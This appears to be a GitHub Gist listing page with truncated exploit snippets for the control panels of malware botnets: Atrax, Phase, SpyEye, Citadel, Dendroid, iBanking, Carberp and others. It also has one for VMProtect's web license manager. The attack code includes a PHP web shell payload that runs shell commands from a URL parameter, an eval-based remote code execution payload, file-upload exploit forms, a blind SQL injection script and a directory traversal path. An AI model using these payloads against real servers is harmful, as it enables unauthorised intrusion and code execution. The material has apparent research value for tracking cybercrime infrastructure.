Skip to content

Instantly share code, notes, and snippets.

@Xyl2k
Xyl2k / Atrax Botnet Shell Upload Vulnerability
Created November 25, 2014 01:53
Atrax Botnet Shell Upload Vulnerability
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
@Xyl2k
Xyl2k / pwn.php
Created December 23, 2014 14:53
Phase botnet blind SQL injection vulnerability
<?php
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this :)
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
<!-- FileStealer v1.3 panel upload vulnerability -->
<!-- Panel hash: be19e93878130b2f57d42d4dcf5ffcf0 -->
<form method="POST" action="http://localhost/panel/up.php" enctype="multipart/form-data">
File: <input type="file" name="file" /> <br />
HWID: <input type="text" name="hwid" value="COOFEEBABE" /> <br />
Hash: <input type="text" name="hash" value="2c471313f06370d0866db1facb34668e" /><br />
PC: <input type="text" name="pc" value="ANDROMAQUE" /> <br />
<input type="hidden" name="step" value="1337" />
<input type="submit" value="Pwn" />
</form>
@Xyl2k
Xyl2k / spyeye.php
Created November 21, 2019 16:06
old sploit release
<?php
/**
* Product : SpyEye Form Grabber
* Type : SQL Injection
* File : mod_savecert.php
* Cybercrime-tracker.net, 2013!
*/
?>
<html>
@Xyl2k
Xyl2k / pwn.html
Created June 17, 2015 18:13
Gorynych/DiamondFox v4.2.0.257- File Upload Vulnerability
<!DOCTYPE html>
<html>
<head>
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title>
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -->
</head>
<body>
<h1>&#9673; Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability &#9673;</h1>
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upload1">
@Xyl2k
Xyl2k / kek.py
Last active May 31, 2021 11:06
Dendroid remote code execution
import requests
# Add URL
# Set a PHP payload
# Go to http://website/config.php
URL = 'http://localhost/Panel/applysettings.php'
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '"
data = {
@Xyl2k
Xyl2k / gist:9a75b885766ae0fc6046
Created October 6, 2014 06:47
iBanking panel upload vulnerability
<!-- iBanking panel upload vulnerability -->
<!-- get.php?p=..&i=.&f=dbconfig.php -->
<form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data">
FiLEZ: <input type="file" name="uploadedfile" /><br />
<input type="hidden" name="bot_id" value="500" />
<input type="hidden" name="imei" value="000000000000000" />
<input type="submit" value="Pwn" />
</form>
import urllib
import urllib2
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
def request(url, params=None, method='GET'):
if method == 'POST':
urllib2.urlopen(url, urllib.urlencode(params)).read()
elif method == 'GET':
<?php
/**
VMProtect Web License Manager 2.2.1 Multiple vulnerabilities
------------------------------------------------------------
Vendor site: http://vmpsoft.com/
First contact............: 11/09/2013
Vendor answer............: 12/09/2013
Vendor fixed the RFI/XSS.: 08/11/2013
Second contact for SQL...: 25/11/2013
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php